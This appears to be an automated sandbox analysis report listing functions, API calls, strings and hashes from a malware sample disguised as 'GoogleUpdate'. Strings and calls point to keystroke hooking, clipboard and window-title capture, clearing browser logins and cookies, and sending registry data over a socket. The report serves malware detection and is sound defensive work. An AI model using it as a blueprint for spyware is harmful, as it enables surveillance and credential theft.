Opcode Fuzzy Hash: 200560daae6b7c2951921310a9a850d73dd86d63f9695ecaabf21497659b4c2f
Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A

Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
RegCloseKey.ADVAPI32(00000000), ref: 00412054

Strings

http\shell\open\command, xrefs: 00412026

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
Opcode Fuzzy Hash: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5

Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18

Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E

Strings

bad locale name, xrefs: 0040CA28

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699

Function 0040A7F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(Function_00009305,00000000,0gj,0040BC76,?,00472200,pth_unenc,0gj), ref: 0040A801
UnhookWindowsHookEx.USER32(000404CB), ref: 0040A811
TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,0gj), ref: 0040A823

Strings

0gj, xrefs: 0040A7F2

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: 0gj
API String ID: 3123878439-1559316900
Opcode ID: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
Instruction ID: 1ea45cce1470398c8d9247cd1949440ee3d7e4d102938376389503cdeb19b454
Opcode Fuzzy Hash: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
Instruction Fuzzy Hash: A4E01D711443456FE3105F606DD49157B5CE6083597514875B606531B1C67CCC88CB3D

Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448C9E
__alldvrm.LIBCMT ref: 00448E9F
__alldvrm.LIBCMT ref: 00448EC1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 37a389c91fd0305d0bc5a94ad43230e35c365edb8f3973a3c9d9ada82f0d9176
Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
Opcode Fuzzy Hash: 37a389c91fd0305d0bc5a94ad43230e35c365edb8f3973a3c9d9ada82f0d9176
Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759

Function 00453DF4 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00453F23

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A

Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788

Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040AF62
Sleep.KERNEL32(00001388), ref: 0040AFEA

Strings

Cleared browsers logins and cookies., xrefs: 0040B036
[Cleared browsers logins and cookies.], xrefs: 0040B025

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 22af38848156231607467cecf4957511bc3d3078600c1b41cc0bd9b9b2c616f1
Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
Opcode Fuzzy Hash: 22af38848156231607467cecf4957511bc3d3078600c1b41cc0bd9b9b2c616f1
Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F

Function 004468DC Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004468EC

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

GetTimeZoneInformation.KERNEL32 ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A

Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E

Sleep.KERNEL32(000001F4), ref: 0040955A
Sleep.KERNEL32(00000064), ref: 004095F5

Strings

], xrefs: 00409562
[ , xrefs: 00409576

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: f35117b26c77fa319d9cb66e8045cf75f7298dad09c70da495946e86f577ec05
Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
Opcode Fuzzy Hash: f35117b26c77fa319d9cb66e8045cf75f7298dad09c70da495946e86f577ec05
Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F

Function 004197E0 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?,004724A0,?,?,00000000), ref: 004197F6
Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041588A), ref: 00419801
GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00419816
__aulldiv.LIBCMT ref: 0041987D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
Instruction ID: 145d7891b6f1dee57345c91865aa58c1fa38592630094fdfab7f37f82c20bed6
Opcode Fuzzy Hash: a10989dffdb38c1c471ca41a2490fa3084ff35cad8f91966e756ab2f281e4d8f
Instruction Fuzzy Hash: 791160735443446BC308FAB5CC95DEB77ACEBC5388F040A3EF54682091EE39DA488BA5

Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB

Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F

Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004401ED

Strings

pow, xrefs: 004401C5, 004401E2

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F

Function 004126FE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412737

Part of subcall function 00412446: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
Part of subcall function 00412446: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 004128A5

Strings

P0F, xrefs: 00412886

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: P0F
API String ID: 3114080316-3540264436
Opcode ID: 15564e17430f72c0e31f05e5d93a2297141348888183f3aaa028a9435fa84657
Instruction ID: 2d28d635716c3df90d830f6dadb90dee404f775c6aa34bcd6e72966151b01206
Opcode Fuzzy Hash: 15564e17430f72c0e31f05e5d93a2297141348888183f3aaa028a9435fa84657
Instruction Fuzzy Hash: 9D41F3306442405BC324F625D992AEFB299AFD1344F40893FB44A631D2EEBC5D4A86AE

Function 0044C138 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 0044C257: _abort.LIBCMT ref: 0044C289
Part of subcall function 0044C257: _free.LIBCMT ref: 0044C2BD

Part of subcall function 0044BECC: GetOEMCP.KERNEL32(00000000,?,?,0044C155,?), ref: 0044BEF7

_free.LIBCMT ref: 0044C1B0
_free.LIBCMT ref: 0044C1E6

Strings

pF, xrefs: 0044C1DA

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID: pF
API String ID: 2991157371-2973420481
Opcode ID: bab6f42d0b0ad1c45baa8cd6d2334fb0c97687a18f596a08bb1afdde7ab90e7e
Instruction ID: fe15ecdc59135b682bea8f5676c8c6c36af8c828548cffef148b997f3b02a595
Opcode Fuzzy Hash: bab6f42d0b0ad1c45baa8cd6d2334fb0c97687a18f596a08bb1afdde7ab90e7e
Instruction Fuzzy Hash: 3431E931901104AFFB50EF9AD481B5A77F4DF40325F29409FE5149B252EB7A9D40CF48

Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

__Init_thread_footer.LIBCMT ref: 0040A6E3

Strings

[End of clipboard], xrefs: 0040A725
[Text copied to clipboard], xrefs: 0040A732

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 44f911444ffa7c3397639edde977d3ee6651e3735ca6fd54ab2b9edf5bc924b1
Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
Opcode Fuzzy Hash: 44f911444ffa7c3397639edde977d3ee6651e3735ca6fd54ab2b9edf5bc924b1
Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D

Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002), ref: 0044EDF2

Strings

OCP, xrefs: 0044ED6B
ACP, xrefs: 0044ED35

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
